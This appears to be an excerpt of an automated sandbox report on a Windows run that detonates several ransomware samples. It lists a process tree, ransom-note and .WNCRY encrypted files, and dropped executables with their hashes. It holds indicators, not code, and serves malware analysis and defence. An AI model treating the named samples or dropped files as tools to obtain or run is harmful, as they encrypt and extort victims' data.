                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 224 -ip 224
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5304
                                                                                                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:8900
                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2388
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:11932
                                                                                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\Windows Defender
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:11100
                                                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:11100 CREDAT:17410 /prefetch:2
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6448
                                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x304 0x474
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5068
                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:9968
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:12148
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:9432
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:13224
                                                                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.1d46f1f8.TXT
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Opens file in notepad (likely ransom note)
                                                                                                                                                                                        PID:7136
                                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:15108
                                                                                                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\Windows Defender
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:14944
                                                                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:14944 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:8856
                                                                                                                                                                                            • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                              C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:13412
                                                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:10820
                                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:12664
                                                                                                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.1d46f1f8.TXT
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                                                                                                    PID:3392
                                                                                                                                                                                                  • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                    sihost.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4504
                                                                                                                                                                                                    • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                      sihost.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:15476
                                                                                                                                                                                                      • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                        sihost.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:12852
                                                                                                                                                                                                        • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                          sihost.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4040
                                                                                                                                                                                                          • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                            sihost.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:16924
                                                                                                                                                                                                            • C:\Windows\system32\sihost.exe
                                                                                                                                                                                                              sihost.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:8728

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                              • C:\Program Files\7-Zip\7-zip.chm.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.7MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                cf95a5920f0683a5690f23631bc65408

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                3ec57a219fe524bd0060dd75e70fe048a1e81a19

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                cce4eb2b43f135c38145a09d6ebb4fc2bd8c78ae16825ed29c08e52e7ff0c9eb

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                aee517882f6607f32323fd1e28826386144d641cba0082ac885c2bfb2579e1bde99b26f0db2395bfb8d656074c93e6e75af0bba24d9bfe5ac9d1961dd72326c3

                                                                                                                                                                                                              • C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3.3MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                390be929f03acdb42bcce8a6b5b1c981

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                211af91b9ef7ffb3d51913061a177dd46b90efb3

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                78cac598a64c809ae0c6b0da6316768c231e8d64dac49f7353c1f4bc19e30b2a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                1222aa06445827a3374cfb466c2e5cc0e5ba6b2c2063b6a9eb2651cd9ca6cc9e837fb82aa5922067dfe17ae767c3066973ed71aaba2f08cb79957e6ba1d199c2

                                                                                                                                                                                                              • C:\ProgramData\regid.1991-06.com.microsoft\305E39-Readme.txt

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                c7e49b2eb9a272f04fa081867e960667

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                008a57054c00415d7993b40513b46af7d150b30d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                3603bff416e27088e1c6f6d6c2cb0185b9c695762cd049dc50345334df398c90

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                0b140cb5b601a741f9621b0ccf4e9841ac22bf4244dce5e4b04b01157563588fcaa240efb6e50fd6f4f7ddeaf3b968b538e275f0a34eba1e053364b117b436a9

                                                                                                                                                                                                              • C:\Recovery\WindowsRE\305E39-Readme.txt.WNCRY.s4keqdh4fb

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                96ab9266736dd13355c3ffc8bcf1ac35

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                7861f1a835a77db19632b542cea2685aa5f7282e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                1fb4ade1bfb8b656ffdbe438f4001cb669380acd1d6a174599f9cf03067c8ddb

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5feefce07b23b3a4436dcf93753f8ebc42006ba9f8bb521e38195e532f55b60d4559cdfd6a45b59e42350b585f508dbbe22bc37772a211a0e5eff75661a4ad00

                                                                                                                                                                                                              • C:\Recovery\WindowsRE\s4keqdh4fb-readme.txt.WNCRY.s4keqdh4fb

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                64cb8dd0a7e51eab28db387d6040fe42

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                bb3f283da55fcae45012ff26f7f762e19acdd22a

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                c35e2c73cde8b58066b3d4caf5e73ad55ee89436749cef5089330027fcdb415f

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                58e4db2d9c98e8de38c1c1a5a7eed590a2786e44dd5e551d65f6a49945a0ded2063b8cf8edcd2b982c51c9f442caf6e5177749b3ebbf9e03585d2177e8d2dcf4

                                                                                                                                                                                                              • C:\Recovery\s4keqdh4fb-readme.txt

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                353e7329b3a6a66b44613f96e770b0dd

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                15c004351d32e8b607e81ab4ba813952188d4292

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                e76c6cfc8d94cb52a43d5ec8d3bc251099f65196a7c5c33646f9a6ec17906571

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                f5d16efa541c9972475e4806124fdae630d8b77d4e6195622cfca5fcb1e4ff6bf7dc694acde7dd3d6dd1f36930e100df1cc1a97258da38998f7eb64aa04f73ef

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DB0A226AC3BF936F0FC2DB09129A2DC6

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                5bfa51f3a417b98e7443eca90fc94703

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                8c015d80b8a23f780bdd215dc842b0f5551f63bd

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\305E39-Readme.txt.WNCRY

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                ac3164165cc30852909606aa1bf64a84

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                686d9714f5a6e95e9ab24b651579e9715f6b2ce3

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                4643bf0a92a8523762c8d328ed23b959ce72ebe1150ab910e32d6475245c6ee8

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                26f85e830a3c0dc0edc613ff404dc675df7daa6e12326e7c71ca466fdea394370406cf17eedc0bdd400799141e9470050f8eeb2657276201f17e3f5daf39b3a7

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                944B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                6bd369f7c74a28194c991ed1404da30f

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en\305E39-Readme.txt.WNCRY

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                6041082cc2d840d0e0b2df6a373158f7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                4574b2689185e02f5e6ca222e2ad852ebbda497e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                fc8c8bf0d8080e9843c2487e30192164224a9ea6158e329917e19476fa0c310e

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                4c5bf2176c26057c324b34a9efe40c91c567fec08e717cc4fab045bd2bf1f47669e9576c060104f3f960091b06642b2bb5fe2758f0921b544a52d5c812c68459

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                896KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                4c3d4e2b3ab3b840f6d2627eda8c3660

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                259da0155a6dd954a4e41b9a37102044dbad15ed

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                482d7e9d84092094ebd6f2986c208e6fd0d2cecc857dce8c287e98245c9035c7

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                9cae4cfdbc5e9c7d1efdf15527357d8435e2a1332fe7f21a9bf19f5757e87d2e4f4eb38e66d18a8678a493faf7c63107c77abe1852f76c23e7bbed82f826f6a6

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                9KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7050d5ae8acfbe560fa11073fef8185d

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\File1.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                273KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1d96091dc25660ac8989193299659be7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                bc95772709ad585d528e43de2af29ed0bb628841

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                d1a6bd542d3570297f37ef478a638a2c7e04645cfb66fef1abe8210aa41c48a8

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                8c47793a478b0aaf12353ee1f1b2883c0a64eba1511889d33a6782e47f0ac8755dc3b594f2a74820f155243f215f015eb216ef62b6500a8fe9cc0d9cbe0baaa2

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\File2.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                17.5MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                09b329f091ef3280107b1a0335712164

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                80c8e1ff112c032c79178a3007316969e42bc040

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                966dcb059dac7f6561a55b55bcc17f77ef01bda17406988ab782b2ec73901b55

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                4d96f92cee63362ba836c65522b1bb9afef6a1e9f5d5725c31bee0508d0c28c32604a795414ff2ed6cbb3ab14b8384a8c3f77f70df4cfc7a4bdd9f986b07fabb

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                138B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                c6a2f862f1b18abd9c133acac614cca8

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                d2f2d302fa4cff80f6f1e49db3368c9dca9cff75

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                8294a56e1548e2b56720000b48a64384cc19b2e23e121108dd49352a1d68cade

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                2afbacf9cb2c24a5854e4d211401cada2acb46c99e14692b4f3243ef67e00da1389fa62cbd0580d2abf9cdfce5c7a36a76f5c93838bc4212fb3502e1519c9d08

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\zapuskbezcmd.vbs

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                73B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                e2b85a4ddadc47d60d0058d712cb655e

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                680af7e70f0842e9dac3e3c23da6ac28cbab586c

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                13a53af0b6d8a425705b48bc8196e3b07e0660b3e0240d168d4a9584b80e4bbb

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                c8d538cfbd45a1ff8393cfa904e1ce038a1d9daf0c7d91179c5fe841b6739a24e4405f09d9e96360cce09d201b50b8186f9f3279b782fca6e0459808c338c1fa

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Vfhaffxjtg.tmp

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                256B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d869d35b2aca57be0e242075b751b9d9

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                99d4bd4d55ebb26766eafc4603c86594c46ffbb7

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                c718f63ccac92db0a68390ebf9813c80ab0c83fffb12cf6a8f73049f14b0ceb4

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                32ca685ff2783b4b1e61a3bb431d6e4bea0363e152e9108d7b37e0a416fe1659fd165b53e3f6bcf3c0c163bd77f4e8109610be934f76e162fc6d13f5b4b83392

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5d34ndeg.hoh.ps1

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                60B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                3f8089378720b936b55608fee5eb9e9d

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                73fa2cd5b27e5bc9568a1ebfb95e7646f7ee2a4a

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                0d559136ad9c0e8b3275caf54271cbf22db7bfa7a1602d9a576437e0a8bc2044

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                32f679b04598b884173efa2d30cf4bfb8e35177018d3b00350ea42a52594fde0dfc7aba1492061e10cb07d51b33f5f488ad69ee51f70fdc94bf6861350e938c0

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sudyr.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                512KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                064d499d2cab83fd08c090af229dae20

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                29a930848efc1d00a51d1693e89ab0f6388e0dd7

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                c02860bdf001ce70c0e77e124fd8d1415a9a1e73066f4e99ade3dedb6fa3b0da

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                e30626a6d174bc790b775282b0d60cebddb19b955a4a69455b432687498dfa8cc5ecda91e02e1028bfe8a0b28d30736d29a9f2fb2b2f4f04e51410e4b93496f8

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\yzkod.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                230KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                9cb07c427872ebc5e327227f329ea4a3

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                08140a54f71b222fac5b033476e8413e1f02390c

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                69e60f995d9ff239196f6d7b5e9bf3110de5d2e82392ffe7361e6a9631d1f19e

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                1348af8a85e16a9ab7fb608856db23b20784b3068d0619dc31d3880cf428895ad1f0415bd1d5fbf0a8dc88ce3784c58f4891247ca77712c271e88b5111e05fb8

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\~DFD72CEF1059778F6C.TMP

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                16KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                b707b561fa36b7be5f6b8be240a917cc

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                1d9acc1e73c649bbcd2bb6dc3cda421720be8f7a

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                6e296cc3ff24e77b665bad8c4652feb9e2d8f32033dbf4cbf7ef0466b76dda4d

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                3e28ce26e4f8fcdcb37dba2069a38696848e7fbec14338cfb8c5295fb94859787381d0be03ef2ad0823dc1f2bf7afc89e369288e36cbb36f74147f2da0cc1098

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7510c411413f257a23ecefe842ed3ed5

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                8545116a3113076b13c4cd2c7efe7bc14f262230

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                ff4d62429aee877e8bb7c7c84f5b85dbd0df4283b04ae875426e2aff415047ad

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                9e826e5356d6c390cfdf4ce19a2856a4fe410698154185bf4a8007da712acd4be389c46f476aa50185a82cba40924e1e1f2f9db2a0dc331cbf6d0e71d1657355

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\ddd.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                318KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                4ea3c3a2afa6d22c1ffb8234c02541de

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                48b4b0644ccdd46c7775b27113bcbd8bcb2650dc

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                cc3df53f8baf7109fcee29d12091e2e268c5632d67a9dd03ef42cc3d6e76dc9b

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                0a43b7bfa0133557e2e845109d9fc25804b3b081764495b0a3a60227b2556acec966486653ed32688937d3555207afc8372d3fb938d30a55e5bdc6a1657226b6

                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00436\@[email protected]

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                933B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7a2726bb6e6a79fb1d092b7f2b688af0

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                b3effadce8b76aee8cd6ce2eccbb8701797468a2

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00436\HED62F~1.EXE.dll

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.7MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                7ac078a4c0a0c82464f31418b512cad7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                edafdb4391106484521c3a76890690ee525a9d68

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                8c8d6d7a1c6ce3ae445a85b32aac61eef74d00effcaaac0379d33cd299008418

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                e5c6cff838a20a0130ed42b170fdd0fcca3491dd65ffb4ced4612b8c8598b3083172f3218a5471c22ffdd6189f748c22e6c7b9417a775344b04956fa2e141507

                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                114KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                5ea955bf05a76d42bf503ae3886493d7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                355837f97cd14734665cb911ecc000bd15ce9987

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                b2e46a5217f90a32a4319817af26bd7b281fd3d7f4d5ca39d95ff9e6ab71b1a6e86828c2f156fc675418d5ed594e1822816ecf0c3893cc3b787d4406525b487f

                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                2.2MB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                b41914b478ac2fdde9e6f0e9017abf62

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                418c5df9f24f10962cd0436b790de445ee09d0be

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                b55a453f47d845992d10ce503c9e3e8d9703b108723a97532c2d43eb6670561438c610de458bd39ad22e1c996b7e3b633d7b579e55d7dc55919e592ddc3da40c

